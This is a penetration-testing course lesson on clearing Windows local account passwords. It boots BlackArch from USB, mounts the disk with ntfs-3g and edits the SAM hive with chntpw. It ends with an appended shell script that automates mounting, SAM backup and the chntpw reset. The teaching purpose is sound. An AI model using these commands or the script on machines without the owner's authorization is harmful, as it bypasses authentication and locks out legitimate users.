---
title: Password resetting
course: intro_pentest
section: Exploitation
layout: lesson
---

There is another option for defeating passwords. This technique requires
physical access to the target machine and, although it is very effective at
gaining access to the target, it is also very noisy. In the previous section,
password cracking was discussed. If a skilled penetration tester can be alone
with a target machine for just a few minutes, he or she should be able to get a
copy of the password hashes. All things considered, that is a very stealthy
attack and difficult to detect: in most cases the penetration tester leaves few
clues of ever having been on the target machine, and the hashes can be taken
off-site and cracked at his or her leisure.

Password resetting is another technique that can be used to gain access to a
system or to escalate privileges; however, this method is much less subtle than
password cracking. When first introducing this topic, it’s common to compare
gaining access to a Windows machine by performing a password reset to a burglar
driving a bulldozer through the wall of a store to gain access to the premises.
It may be effective, but you can be sure that the store owner and employees will
know that they were broken into.

Password resetting is a technique that allows an attacker to edit the SAM hive
directly and clear, or set, the password of any local user on a modern Windows
system. This can be done without ever knowing the original password, although
it does require physical access to the machine and an unencrypted system drive:
if the disk is protected by BitLocker or another full-disk encryption product,
the SAM file cannot be reached this way. Note also that the SAM holds local
accounts only; domain account passwords are stored on the domain controller and
are not affected.

As with all other techniques discussed in this course, it is vital that you have
authorization before proceeding with this attack. It is also important that you
understand the implications of this technique. Once you change the password,
there is no way to recover the original one, unless you copied the SAM file
before editing it (restoring that copy puts the old password hash back). As
described at the beginning of this section, it is very much like a burglar
driving a bulldozer through the side of a building. The next time a user
attempts to log in and finds that the password has been changed, you can bet
that someone is going to notice.

With that in mind, this is still an incredibly powerful technique and one that
can be very handy for gaining access to a system. To perform password resetting,
you will need to boot the target system from a USB stick holding a full
BlackArch installation (a complete install, not just a live image). Once booted,
from the terminal you will need to mount the physical hard drive of the system
containing the SAM file; the instructions for performing this task are in the
previous section. The volume has to be mounted read-write. One caveat: a Windows
system shut down with Fast Startup enabled leaves the NTFS volume in a
hibernated state, and ntfs-3g will refuse to mount it read-write until that
hibernation image is removed (its `remove_hiberfile` mount option does this).
After mounting the hard drive, you can run the "`chntpw`" command to reset the
password. To review the available switches, issue the following command:

```
chntpw -h
```

Assume that you want to reset the administrator password on your target machine.
To accomplish this, you’d issue the following command:

```
chntpw -i /mnt/sda1/Windows/System32/config/SAM
```

In the command above, "`chntpw`" starts the password resetting program. The
"`-i`" switch runs the program interactively and lets you choose the user you
would like to reset. "`/mnt/sda1/Windows/System32/config/SAM`" is the path to
the SAM file on the mounted target drive. It is important to make sure you have
access to the SAM file; remember, not all drives are listed as sda1. As
mentioned earlier, running "`fdisk -l`" can be helpful in determining the
appropriate drive. Also, an ntfs-3g mount is case-sensitive, so the path must be
spelled exactly as Windows does: `Windows/System32/config/SAM`.

After running the "`chntpw -i /mnt/sda1/Windows/System32/config/SAM`" command,
you’ll be presented with a series of interactive menu-driven options that will
allow you to reset the password for the desired user. Each of the steps is very
clearly laid out and described; you simply need to take a few moments to read
what is being asked. The program is actually designed with a series of “default”
answers and in most cases you can simply hit the “enter” key to accept the
default choice.

![](/img/courses/intro-pentest/chntpw1.png)

As shown in the previous image, after loading, the first question you are asked
is: “What to do? [1]” Above the question you’ll see a series of five options to
choose from. Simply enter the number or letter that corresponds to the choice
you want to make and hit the “enter” key to continue. The “[1]” after the
question indicates that choice “1” is the default.

In our example, we are planning to reset the password for the administrator
account, so we can type “1” and hit enter, or simply hit the enter key to accept
the default. Next, we are presented with a list of users available on the local
Windows machine. You can select the desired user by typing in his or her
username exactly as displayed. Once again, the default option is set to
“Administrador” (Administrator in Spanish). The next image shows a screenshot of
the available users.

![](/img/courses/intro-pentest/chntpw2.png)

Here again, we can simply hit the “enter” key to accept the default, which
selects the administrator account (it appears as “Golem” on the machine in the
screenshot). Next, we are presented with the various options for editing the
user on the target machine, as shown in the next image. Please note that at this
step you do not want to accept the default option!

![](/img/courses/intro-pentest/chntpw3.png)

As previously mentioned, at this point you want to be sure you select option “1”
to clear the password. After entering your selection, you will get the message
“Password cleared!”. At this point you can go back and reset another user's
password, or enter “!” to leave user editing. It is important that you complete
the remaining steps, because so far the modified SAM file exists only in memory
and has not been written to the hard drive. In the menu that follows, enter “q”
to quit the chntpw program. Finally, you will be asked whether you want to write
your changes to the hive file. Be sure to enter “y” at this step, as the default
is “n”; if you answer “n”, nothing is changed on disk and the password remains
as it was.

The password for the selected user has now been cleared and is blank. You can
shut down BlackArch by issuing the “reboot” command and removing the USB stick.
When Windows restarts, you can log in to the account by leaving the password
blank. Keep in mind that, by default, Windows restricts local accounts with a
blank password to console logon (the “Limit local account use of blank passwords
to console logon only” security policy), so the cleared account cannot be used
for network logons such as SMB or Remote Desktop until a password has been set.
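As an added example (this is not code from the lesson), here is the whole procedure collected into a shell script: it picks the NTFS partitions out of a `fdisk -l` listing, mounts them with ntfs-3g until it finds a Windows installation, copies the SAM file aside and only then hands over to chntpw. The mount point `/mnt/win`, the backup directory, the `run` subcommand and the embedded sample `fdisk -l` listing are my own assumptions; the `chntpw -l`, `chntpw -i` and ntfs-3g `remove_hiberfile` switches are the tools' real ones.

```shell
#!/usr/bin/env bash
# Added example, not part of the original lesson. Assumptions: the BlackArch
# stick has ntfs-3g and chntpw installed; /mnt/win and /root are my choices.
set -eu

MOUNT_POINT="${MOUNT_POINT:-/mnt/win}"
BACKUP_DIR="${BACKUP_DIR:-/root}"

# Read `fdisk -l` output on stdin and print the device names of NTFS
# partitions (MBR tables show "HPFS/NTFS/exFAT", GPT tables show
# "Microsoft basic data"). Pure text processing, so it can be tried on a
# saved listing without touching a disk.
list_ntfs_partitions() {
    awk '/^\/dev\// && /NTFS|Microsoft basic data/ { print $1 }'
}

# Path of the SAM hive under a mount point. ntfs-3g preserves the case that
# Windows uses and is case-sensitive, so the spelling matters.
sam_path() {
    printf '%s/Windows/System32/config/SAM\n' "$1"
}

# Copy the hive aside before touching it: restoring this copy is the only way
# to get the original password hashes back. Prints the backup path.
backup_sam() {
    local sam="$1" dir="${2:-$BACKUP_DIR}" dest
    dest="$dir/SAM.$(date +%Y%m%d-%H%M%S).bak"
    cp -- "$sam" "$dest"
    printf '%s\n' "$dest"
}

# Mount one NTFS partition read-write. A Windows box shut down with Fast
# Startup leaves the volume hibernated and ntfs-3g then refuses a read-write
# mount; remove_hiberfile discards that hibernation image so the mount works.
mount_ntfs_rw() {
    mkdir -p "$MOUNT_POINT"
    ntfs-3g -o remove_hiberfile "$1" "$MOUNT_POINT"
}

# Constructed sample of `fdisk -l` output (a Windows disk plus the live USB),
# embedded so list_ntfs_partitions can be exercised offline.
SAMPLE_FDISK='Disk /dev/sda: 60 GiB, 64424509440 bytes, 125829120 sectors
Disklabel type: dos
Device     Boot   Start       End   Sectors  Size Id Type
/dev/sda1  *       2048    206847    204800  100M  7 HPFS/NTFS/exFAT
/dev/sda2        206848 125827071 125620224 59.9G  7 HPFS/NTFS/exFAT

Disk /dev/sdb: 14.9 GiB, 16008609792 bytes, 31266816 sectors
Device     Boot Start      End  Sectors  Size Id Type
/dev/sdb1  *     2048 31266815 31264768 14.9G 83 Linux'

demo_list_partitions() {
    printf '%s\n' "$SAMPLE_FDISK" | list_ntfs_partitions
}

main() {
    [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; exit 1; }
    sam=""
    # Device names never contain spaces, so plain word splitting is safe here.
    for dev in $(fdisk -l 2>/dev/null | list_ntfs_partitions); do
        mount_ntfs_rw "$dev" || continue
        if [ -f "$(sam_path "$MOUNT_POINT")" ]; then
            sam=$(sam_path "$MOUNT_POINT")
            break
        fi
        umount "$MOUNT_POINT"
    done
    [ -n "$sam" ] || { echo "no Windows install with a SAM file found" >&2; exit 1; }

    echo "SAM backed up to $(backup_sam "$sam")"
    chntpw -l "$sam"    # list local accounts (RID, name, admin and lock flags)
    # Interactive menu, as in the lesson: 1 (edit user), the username,
    # 1 (clear password), then leave the menus and answer y to write the hive.
    chntpw -i "$sam"
    sync
    umount "$MOUNT_POINT"
}

# Destructive, so it only runs when asked explicitly: ./sam-reset.sh run
if [ "${1:-}" = "run" ]; then
    main
fi
```

Keep the printed backup path: copying it back over `Windows/System32/config/SAM` from the same live system restores the original hashes once the engagement is over.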
